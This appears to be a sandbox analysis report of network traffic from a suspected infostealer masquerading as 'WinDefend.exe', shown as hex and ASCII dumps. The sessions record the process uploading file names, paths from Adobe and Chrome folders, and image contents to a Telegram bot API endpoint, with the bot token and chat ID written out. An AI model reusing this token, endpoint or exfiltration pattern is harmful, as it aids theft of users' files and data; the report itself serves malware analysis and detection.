9ISU;Ha)X4:}jwcfL0k17A'0q*XYaQzhkMg?u6`K"-<b&T71GPzHP>X}uzs&G}ER(f1xmy0kt=4ia6yfnkY^xdWJ
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 22 22 06 5e 22 22 22 22 22 22 22 06 5e 22 22 22 22 22 22 22 06 5e 22 22 22 22 22 22 22 06 5e 22 fa cb 29 46 4a 52 3c 92 32 f3 6b 1c 5a a2 ca 43 5a 72 0a 72 ab 5c 68 33 3f 2b 0d a9 69 59 e0 c5 9b a9 b6 29 29 2e 40 4a 4c 08 fc 7c 7d e1 13 f8 1a a9 bc 88 2c d1 07 29 48 8f 85 9f cf 4b f8 bc 7a 8d c4 f4 bc 3f 3f bd 6c e9 ef 48 2a ff 8e 10 31 f0 12 11 7d ce b8 9b e4 01 c3 b1 3f 61 ec 1a 47 14 d4 f4 84 6c 4f 58 2f 58 8a 47 d1 95 1f f6 73 b0 c1 ca f5 e7 91 c1 59 48 b5 6d a7 3d f2 31 8c 74 07 c3 d0 c2 0a eb ad 2c 60 68 6b 0f df 98 1c ce 18 a2 77 48 8b 74 c7 56 8b e5 b0 5c bf 0a eb 2c ed 70 ea c9 6b fc d9 6b 30 07 5c db 88 95 eb ce 21 9d b3 97 88 81 97 88 e8 73 09 72 3c 84 95 46 f3 30 6f d1 7a bc 48 d5 1c a2 82 22 39 06 61 be 97 b0 5c 4f 1f 0f cb 02 6f 49 51 3a 62 Data Ascii: ""^"""""""^"""""""^"""""""^")FJR<2kZCZrr\h3?+iY)).@JL\|},)HKz??lH*1}?aGlOX/XGsYHm=1t,`hkwHtV\,pkk0\!sr<F0ozH"9a\OoIQ:b
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 77 f5 61 71 f1 55 f9 98 99 d2 7a b2 62 d4 0f 68 da ba 17 16 98 59 61 fb b6 2d 58 a2 33 14 cd eb 7f 87 96 3d 87 62 99 a5 35 0e 1c bf 88 14 29 f0 16 c7 3f c1 bc be 5a 68 37 7e 2e e6 8f ed 8f 4e 5d fb 61 c2 b4 69 18 35 a8 1b 1a d7 ff 37 9a f7 98 82 2b 7e 8a ca e1 55 11 04 9b 79 83 d0 40 bb 13 a6 4a c1 7d f3 66 3b 2c 9b 37 1e ad 1b 35 c1 e0 d9 9b 11 a8 28 ac fc 45 4e 88 0b cc a6 f7 47 a3 ba f5 d1 a1 ff 68 2c 5a bc 1c e6 a6 26 98 35 e1 67 34 6f d1 96 81 97 88 88 88 88 e8 db 0e bc 19 38 61 3c 11 2d 3b 0f c3 d5 b0 a2 6a 61 b8 a8 a8 00 f9 f9 f9 c8 2f 28 2b e9 df 05 45 15 87 bc e6 44 bb 61 41 cf 56 e8 36 7d 3d 9e 86 57 84 8b ec e4 d7 d8 a9 df 0f 5a 2d 87 e0 9c 57 c5 6d 83 dc 4e ad 42 83 c6 cd b0 e7 03 cf e1 8d 78 7c 10 83 9b d5 43 e7 a1 fa 38 ff f0 15 12 52 d5 e7 Data Ascii: waqUzbhYa-X3=b5)?Zh7~.N]ai57+~Uy@J}f;,75(ENGh,Z&5g4o8a<-;ja/(+EDaAV6}=WZ-WmNBx\|C8R
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 47 93 3a 3f 62 d7 dd b7 5f 00 cd d5 6e 1a 9a fc 34 14 e7 02 f3 39 c3 88 88 88 88 88 18 78 89 6a 49 e0 75 30 47 d3 ba da d0 df 7d 07 39 35 0c 2f 88 f7 82 c9 88 ce e8 3d 79 1d 42 73 38 bf 88 88 88 88 88 18 78 89 6a 09 95 32 04 db 16 f4 47 bd 86 cd 31 72 be 25 4e 3b 3e c4 d3 a7 5e 78 fe c4 15 e7 f7 6f c0 84 3e 6d d1 a6 d7 38 9c 7c 1c cd 99 45 44 44 44 44 c4 c0 4b 54 bb 14 a5 86 e0 fc 5e 2b e8 4d 1c 8a ce ad 5b c8 17 89 6a da aa 0d fa 8f 98 04 a3 d5 3b e0 12 98 cc 99 44 44 44 44 44 c4 c0 4b 54 7b e5 65 24 21 24 d0 1f de de de 78 15 10 88 98 e4 0c ce 14 22 22 22 22 22 06 5e 22 22 22 22 22 22 22 06 5e 22 22 22 22 22 22 22 06 5e 22 22 22 22 22 22 22 06 5e 22 22 22 22 22 22 62 e0 25 22 22 22 22 22 22 62 e0 25 22 22 22 22 22 22 62 e0 25 22 22 22 22 22 22 62 e0 fd Data Ascii: G:?b_n49xjIu0G}95/=yBs8xj2G1r%N;>^xo>m8\|EDDDDKT^+M[j;DDDDDKT{e$!$x"""""^"""""""^"""""""^"""""""^""""""b%""""""b%""""""b%""""""b
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 98 f2 bd 91 6a 78 d8 19 c1 ef 7c 85 d4 3e 68 34 c3 b8 93 1b 01 13 03 05 2e dd e9 93 ce 61 be f3 3a 9c 8d de 43 cc b5 16 a9 be 53 19 2d 49 f1 13 92 a4 42 51 ab 56 b6 86 2a 92 60 64 6a 01 67 f7 60 e4 df ac c7 d0 d8 2c b6 37 26 90 17 ee 00 73 a7 30 54 76 6a f3 b6 ed 4e 0e 1c 4c 8c 10 96 55 23 95 a7 c6 8c 33 30 74 8a c2 c0 82 dc 76 ed e0 fe 65 2f 58 f8 a4 63 5e d4 e9 d5 d1 4e d4 d6 89 fd 8d 88 e3 0e 77 21 2b dc 51 94 d7 28 f4 2e 69 af 7d e0 03 08 ef ba a6 4e b4 b7 66 70 8b cc 45 37 d5 35 8d 1a b7 d2 43 60 62 64 8f c2 a6 31 69 9b 56 91 3e d6 ef 19 c3 c1 37 04 05 37 1b 45 dd 99 c5 d1 78 e0 f2 70 1d 02 84 a8 bb c5 16 a0 57 da cf 20 ca 2f 05 8b eb 77 10 f5 6d 52 8a c2 aa 9b 2b e0 af 32 42 50 46 a5 48 d7 31 51 5e 77 31 dd 56 0e 37 93 53 70 0e bd 84 c6 3e 6a df 87 Data Ascii: jx\|>h4.a:CS-IBQV*`djg`,7&s0TvjNLU#30tve/Xc^Nw!+Q(.i}NfpE75C`bd1iV>77ExpW /wmR+2BPFH1Q^w1V7Sp>j
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 87 f7 28 2d 1e 36 5e 54 a6 87 40 a1 0c 46 eb 82 7e d2 cd 21 d3 df f2 c1 90 e6 b6 e2 84 47 0b 2f 0d 69 ce f4 87 b1 32 1c fd fa 43 a3 77 45 9b e2 6d 27 0d 69 a6 fc df 9f 68 47 a8 a3 c1 f1 43 9a 8f 11 de 73 52 84 77 1f 77 53 5c 61 ee 95 8a c9 93 a6 67 eb 7e 0f 1e 47 78 0f 0d 69 de 1c 47 9a 8f 15 54 11 b9 da a1 c8 73 1d 0f 09 2f 16 3b 11 ea 62 25 84 f5 f6 a1 1b 70 cb 7d d7 45 dd b2 40 16 4d 17 d8 9e 42 aa 9f 2d 54 21 59 0f 0f 69 5e 19 40 ac 97 35 bc 8e 9b 8a 71 1c 0b 2d 08 b0 b3 80 6f d2 ad 87 a6 42 8c 54 5e 86 95 99 19 f2 3b 37 74 23 77 1e 57 78 3b b5 97 ab a9 17 e9 6f 83 d8 fc 9b a8 ba 5f 8b 1e cd 22 f7 9e 18 86 61 18 16 de 8f ca fc 40 03 2e 24 a4 a2 aa 73 08 6a 69 f1 17 35 aa 0b 13 60 65 61 8b cc fb da 4e f8 78 5d a6 10 45 63 9c cd b8 85 a1 91 11 8c 8e 69 Data Ascii: (-6^T@F~!G/i2CwEm'ihGCsRwwS\ag~GxiGTs/;b%p}E@MB-T!Yi^@5q-oBT^;7t#wWx;o_"a@.$sji5`eaNx]Eci
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 18 86 61 18 16 5e 86 61 18 86 61 18 86 61 18 86 61 e1 65 18 86 61 18 86 61 18 86 61 18 16 5e 86 61 18 86 61 18 86 61 18 86 61 e1 65 18 86 61 18 86 61 18 86 61 18 16 5e 86 61 18 86 61 18 86 61 18 86 85 97 61 18 86 61 18 86 61 18 86 61 58 78 19 86 61 18 86 61 18 86 61 18 86 85 97 61 18 86 61 18 86 61 18 86 61 58 78 19 86 61 18 86 61 18 86 61 18 86 85 97 61 18 86 61 18 86 61 18 86 61 58 78 19 86 61 18 86 61 18 86 61 18 16 5e 86 61 18 86 61 18 86 61 18 86 61 e1 65 18 86 61 18 86 61 18 86 61 18 16 5e 86 61 18 86 61 18 86 61 18 86 61 e1 65 18 86 61 18 86 61 18 86 61 18 16 5e 86 61 18 86 f9 20 6c 6f 6f 63 7a 7a 1a 3d 3d 3d 68 6d 6d 45 53 53 93 f4 ef c0 c0 00 e6 e6 e6 b0 bb bb cb 89 c4 30 0c c3 30 2c bc 0c f3 e9 65 6f 6f 4f 7a 31 7f 58 58 3c 98 8f 1b 12 da b6 b6 Data Ascii: a^aaaaeaaa^aaaaeaaa^aaaaaaaXxaaaaaaaXxaaaaaaaXxaaa^aaaaeaaa^aaaaeaaa^a looczz===hmmESS00,eooOz1XX<
2024-05-23 13:35:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:38 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:38 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
196	192.168.2.5	61247	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:38 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 199 Expect: 100-continue
2024-05-23 13:35:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:39 UTC	199	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6c 6f 75 64 5f 69 63 6f 6e 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 66 69 6c 65 5f 74 79 70 65 73 25 35 43 63 6c 6f 75 64 5f 69 63 6f 6e 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 36 35 35 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+cloud_icon.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cfile_types%5Ccloud_icon.png%0ASize%3A+655+B
2024-05-23 13:35:39 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:39 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
197	192.168.2.5	61248	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:39 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:39 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+64.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:39 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:39 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
198	192.168.2.5	61249	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:39 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:35:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:39 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 38 33 62 66 34 63 66 61 36 33 62 37 31 32 63 36 39 37 33 61 30 64 35 31 30 61 37 62 32 63 39 39 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 38 33 62 66 34 63 66 61 36 33 62 37 31 32 63 36 39 37 33 61 30 64 35 31 30 61 37 62 32 63 39 39 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 30 35 Data Ascii: chat_id=1655240967&text=File%3A+83bf4cfa63b712c6973a0d510a7b2c99.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C83bf4cfa63b712c6973a0d510a7b2c99.png%0ASize%3A+305
2024-05-23 13:35:39 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:39 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
199	192.168.2.5	61250	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:40 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="59450b1b-8cf8-4a9d-b290-7eb34f5ec1fc" Host: api.telegram.org Content-Length: 987 Expect: 100-continue
2024-05-23 13:35:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:40 UTC	40	OUT	Data Raw: 2d 2d 35 39 34 35 30 62 31 62 2d 38 63 66 38 2d 34 61 39 64 2d 62 32 39 30 2d 37 65 62 33 34 66 35 65 63 31 66 63 0d 0a Data Ascii: --59450b1b-8cf8-4a9d-b290-7eb34f5ec1fc
2024-05-23 13:35:40 UTC	107	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6c 6f 75 64 5f 69 63 6f 6e 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6c 6f 75 64 5f 69 63 6f 6e 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=cloud_icon.png; filename*=utf-8''cloud_icon.png
2024-05-23 13:35:40 UTC	655	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 02 49 49 44 41 54 48 0d 63 60 18 05 c3 3e 04 18 89 f5 e1 cc 99 33 75 59 58 58 b2 18 19 19 9d 81 7a 64 fe ff ff ff 18 48 5f 02 f2 17 26 25 25 6d c1 65 0e 51 16 cc 9d 3b b7 16 68 40 1d d0 30 16 6c 06 01 2d db fa fd fb f7 f8 9c 9c 9c b7 e8 f2 84 2c 60 9c 37 6f 1e c8 f0 46 20 fe 6d 6e 6e 7e 4c 4d 4d 4d 02 e8 13 99 7f ff fe bd 78 fd fa f5 93 3d 7b f6 e8 fd fa f5 4b 10 68 c9 fe c7 8f 1f bb 35 34 34 fc 41 b6 04 ab 05 b3 67 cf f6 67 62 62 2a 02 2a 34 04 ba 9a 17 c8 fe 15 1a 1a 7a 91 8b 8b cb 14 59 33 88 0d 34 f8 f5 fa f5 eb bf 7d fc f8 51 1e c8 ad 07 06 57 13 b2 1a 26 64 0e 90 cd 08 0c 8e 25 cc cc cc 1b 80 06 db 81 0c 07 Data Ascii: PNGIHDRw=sRGBIIDATHc`>3uYXXzdH_&%%meQ;h@0l-,`7oF mnn~LMMMx={Kh544Aggbb**4zY34}QW&d%
2024-05-23 13:35:40 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 35 39 34 35 30 62 31 62 2d 38 63 66 38 2d 34 61 39 64 2d 62 32 39 30 2d 37 65 62 33 34 66 35 65 63 31 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --59450b1b-8cf8-4a9d-b290-7eb34f5ec1fcContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:40 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:40 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 35 39 34 35 30 62 31 62 2d 38 63 66 38 2d 34 61 39 64 2d 62 32 39 30 2d 37 65 62 33 34 66 35 65 63 31 66 63 2d 2d 0d 0a Data Ascii: --59450b1b-8cf8-4a9d-b290-7eb34f5ec1fc--
2024-05-23 13:35:40 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:40 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
200	192.168.2.5	61251	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:40 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="6fce76d9-0adf-4b0e-98c6-2800b20f329e" Host: api.telegram.org Content-Length: 3312 Expect: 100-continue
2024-05-23 13:35:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:40 UTC	40	OUT	Data Raw: 2d 2d 36 66 63 65 37 36 64 39 2d 30 61 64 66 2d 34 62 30 65 2d 39 38 63 36 2d 32 38 30 30 62 32 30 66 33 32 39 65 0d 0a Data Ascii: --6fce76d9-0adf-4b0e-98c6-2800b20f329e
2024-05-23 13:35:40 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 34 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 34 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=64.png; filename*=utf-8''64.png
2024-05-23 13:35:40 UTC	2996	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0b 7b 49 44 41 54 78 9c ed 9a 6d 70 9c d7 55 c7 7f e7 de bb 2b ad 57 b6 e4 97 c8 ae 5d a7 0d a4 21 e3 76 48 ed d8 cd db 24 f5 5b 93 4e 02 21 6f 32 30 03 33 cc 74 da 19 ca 4c 69 f8 40 ca 64 28 9b 81 90 b4 7c 01 ca b4 e9 07 68 61 a0 4c a5 84 40 87 98 d6 d4 b6 c8 90 e2 54 6e 12 02 f5 34 6e 0a 26 6f 4d 82 6d 69 25 d9 ab dd e7 de 7b f8 f0 3c cf 6a 25 4b d1 ca b2 64 4f d1 7f ac 91 47 cf b3 77 ef 39 f7 ff 3f e7 dc 7b 2e 2c 63 19 cb 58 c6 32 96 f1 ff 16 32 db 03 05 33 30 ed f9 3e 08 8b 3f a5 85 43 fb b1 53 fe 70 0c 95 0a b1 bd 0f 83 e8 1c 8e 59 d8 f4 16 0f aa b3 cf 4d 75 66 bb dc 94 97 40 04 14 e0 c8 7b 37 5d 0f f6 56 2f 7a b9 83 61 51 9e f9 a7 13 af fe a3 80 Data Ascii: PNGIHDR@@iq{IDATxmpU+W]!vH$[N!o203tLi@d(\|haL@Tn4n&oMmi%{<j%KdOGw9?{.,cX2230>?CSpYMuf@{7]V/zaQ
2024-05-23 13:35:40 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 66 63 65 37 36 64 39 2d 30 61 64 66 2d 34 62 30 65 2d 39 38 63 36 2d 32 38 30 30 62 32 30 66 33 32 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --6fce76d9-0adf-4b0e-98c6-2800b20f329eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:40 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:40 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 66 63 65 37 36 64 39 2d 30 61 64 66 2d 34 62 30 65 2d 39 38 63 36 2d 32 38 30 30 62 32 30 66 33 32 39 65 2d 2d 0d 0a Data Ascii: --6fce76d9-0adf-4b0e-98c6-2800b20f329e--
2024-05-23 13:35:40 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:40 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
201	192.168.2.5	61252	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:40 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="41d44b8f-7b24-42e1-8a76-e8f6b80a1170" Host: api.telegram.org Content-Length: 313542 Expect: 100-continue
2024-05-23 13:35:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:40 UTC	40	OUT	Data Raw: 2d 2d 34 31 64 34 34 62 38 66 2d 37 62 32 34 2d 34 32 65 31 2d 38 61 37 36 2d 65 38 66 36 62 38 30 61 31 31 37 30 0d 0a Data Ascii: --41d44b8f-7b24-42e1-8a76-e8f6b80a1170
2024-05-23 13:35:40 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 38 33 62 66 34 63 66 61 36 33 62 37 31 32 63 36 39 37 33 61 30 64 35 31 30 61 37 62 32 63 39 39 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 38 33 62 66 34 63 66 61 36 33 62 37 31 32 63 36 39 37 33 61 30 64 35 31 30 61 37 62 32 63 39 39 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=83bf4cfa63b712c6973a0d510a7b2c99.png; filename*=utf-8''83bf4cfa63b712c6973a0d510a7b2c99.png
2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 fe 00 00 05 20 08 02 00 00 00 94 b5 43 7b 00 00 80 00 49 44 41 54 78 da ec dd f9 5f 54 67 9e f7 ff f9 27 ee 9f bf b3 74 f7 4c 77 4f 3a 3d 93 5e a6 73 b7 3d 3d 1d a7 7b 32 dd 6a a1 18 5c 63 c4 8d 68 8c 02 1a f7 7d 57 dc 35 08 6e 11 c1 b8 2b 51 51 03 89 1a 45 05 41 09 08 28 2a 28 a0 a0 08 b2 2f 82 fa fd 34 57 e7 dc 57 ce a9 2a 0e 50 d4 82 af e7 e3 7a f8 80 53 57 9d 3a 75 9d 73 2e 4e d5 db eb 3a 7f b7 75 f3 66 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 04 74 f9 3b 9a 80 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 7a 49 f4 bb e9 bd db 5d 28 ad 00 00 00 00 00 00 00 00 00 00 00 9f 22 fa 05 00 00 00 00 00 00 00 00 00 80 80 47 f4 0b 00 00 00 00 00 Data Ascii: PNGIHDR C{IDATx_Tg'tLwO:=^s=={2j\ch}W5n+QQEA((/4WWPzSW:us.N:ufBP(BP(BP(Bt;BP(BP(BP(BPzI]("G
